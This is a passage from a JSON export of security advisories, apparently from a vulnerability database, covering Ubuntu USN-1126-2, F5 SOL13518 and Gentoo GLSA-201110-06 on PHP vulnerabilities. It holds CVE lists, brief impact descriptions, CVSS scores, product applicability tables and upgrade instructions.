for Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, \nUbuntu 10.10, and Ubuntu 11.04 should reduce the vulnerability to a \ndenial of service. (CVE-2011-1464)\n\nIt was discovered that an integer overflow in the SdnToJulian function \nin the PHP Calendar extension could allow an attacker to cause a \ndenial of service (application crash). (CVE-2011-1466)\n\nTomas Hoger discovered that an integer overflow in the \nNumberFormatter::setSymbol function in the PHP Intl extension \ncould allow an attacker to cause a denial of service (application \ncrash). This issue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu \n11.04. (CVE-2011-1467)\n\nIt was discovered that multiple memory leaks in the PHP OpenSSL \nextension might allow a remote attacker to cause a denial of service \n(memory consumption). This issue affected Ubuntu 10.04 LTS, Ubuntu \n10.10, and Ubuntu 11.04. (CVE-2011-1468)\n\nDaniel Buschke discovered that the PHP Streams component in PHP \nhandled types improperly, possibly allowing an attacker to cause a \ndenial of service (application crash). (CVE-2011-1469)\n\nIt was discovered that the PHP Zip extension could allow an attacker to \ncause a denial of service (application crash) via a ziparchive stream \nthat is not properly handled by the stream_get_contents function. This \nissue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu \n10.10, and Ubuntu 11.04. (CVE-2011-1470)\n\nIt was discovered that an integer signedness error in the PHP Zip \nextension could allow an attacker to cause a denial of service (CPU \nconsumption) via a malformed archive file. This issue affected \nUbuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu 10.10, and \nUbuntu 11.04. (CVE-2011-1470) (CVE-2011-1471)", "edition": 5, "modified": "2011-05-05T00:00:00", "published": "2011-05-05T00:00:00", "id": "USN-1126-2", "href": "https://ubuntu.com/security/notices/USN-1126-2", "title": "PHP Regressions", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2016-09-26T17:23:05", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2012-2311", "CVE-2012-2376", "CVE-2011-1466", "CVE-2012-0789", "CVE-2012-1823", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2012-0788", "CVE-2010-4645", "CVE-2007-4658", "CVE-2011-0708", "CVE-2011-1468", "CVE-2012-0057", "CVE-2010-3709", "CVE-2011-1469", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2012-0831"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-07-25T00:00:00", "published": "2012-04-04T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/13000/500/sol13518.html", "id": "SOL13518", "title": "SOL13518 - Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:38", "bulletinFamily": "software", "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2012-2311", "CVE-2012-2376", "CVE-2011-1466", "CVE-2012-0789", "CVE-2012-1823", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2012-0788", "CVE-2010-4645", "CVE-2007-4658", "CVE-2011-0708", "CVE-2011-1468", "CVE-2012-0057", "CVE-2010-3709", "CVE-2011-1469", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2012-0831"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently-supported releases for potential vulnerability, and has determined that none of the products listed below are affected.\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| None| 10.x \n11.x| None \nBIG-IP GTM| None| 10.x \n11.x| None \nBIG-IP ASM| None| 10.x \n11.x| None \nBIG-IP Link Controller| None| 10.x \n11.x| None \nBIG-IP WebAccelerator| None| 10.x \n11.x| None \nBIG-IP PSM| None| 10.x \n11.x| None \nBIG-IP WOM| None| 10.x \n11.x| None \nBIG-IP APM| None| 10.x \n11.x| None \nBIG-IP Edge Gateway| None| 10.x \n11.x| None \nBIG-IP Analytics| None| 11.x| None \nBIG-IP AFM| None| 11.x| None \nBIG-IP PEM| None| 11.x| None \nBIG-IP AAM| None| 11.x| None \nFirePass| None| 6.x \n7.x| None \nEnterprise Manager| None| 1.x \n2.x \n3.x| None \nARX| None| 5.x \n6.x| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2017-04-06T16:51:00", "published": "2012-04-05T02:07:00", "href": "https://support.f5.com/csp/article/K13518", "id": "F5:K13518", "title": "Multiple PHP vulnerabilities", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0752", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-1471", "CVE-2010-1129", "CVE-2010-2225", "CVE-2010-1868", "CVE-2011-1148", "CVE-2010-2484", "CVE-2010-2097", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-3189", "CVE-2010-3065", "CVE-2010-2191", "CVE-2011-1938", "CVE-2010-4697", "CVE-2010-1866", "CVE-2010-1915", "CVE-2011-1092", "CVE-2010-4698", "CVE-2011-2483", "CVE-2006-7243", "CVE-2011-0753", "CVE-2010-4645", "CVE-2010-3436", "CVE-2010-2093", "CVE-2011-1657", "CVE-2011-0708", "CVE-2010-3870", "CVE-2011-3268", "CVE-2010-1861", "CVE-2010-2190", "CVE-2010-3063", "CVE-2011-3182", "CVE-2010-2101", "CVE-2011-1468", "CVE-2011-0420", "CVE-2010-3062", "CVE-2010-1914", "CVE-2011-1470", "CVE-2010-1860", "CVE-2010-2094", "CVE-2010-3709", "CVE-2010-3064", "CVE-2011-1469", "CVE-2009-5016", "CVE-2011-3267", "CVE-2010-3710", "CVE-2010-4150", "CVE-2011-1464", "CVE-2011-0755", "CVE-2010-4699", "CVE-2010-1130", "CVE-2010-2100", "CVE-2011-2202", "CVE-2010-2950", "CVE-2010-4700", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-1864", "CVE-2010-4409", "CVE-2010-1862"], "edition": 1, "description": "### Background\n\nPHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. \n\n### Description\n\nMultiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA context-dependent attacker could execute arbitrary code, obtain sensitive information from process memory, bypass intended access restrictions, or cause a Denial of Service in various ways. \n\nA remote attacker could cause a Denial of Service in various ways, bypass spam detections, or bypass open_basedir restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll PHP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/php-5.3.8\"", "modified": "2011-10-10T00:00:00", "published": "2011-10-10T00:00:00", "id": "GLSA-201110-06", "href": "https://security.gentoo.org/glsa/201110-06", "type": "gentoo", "title": "PHP: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}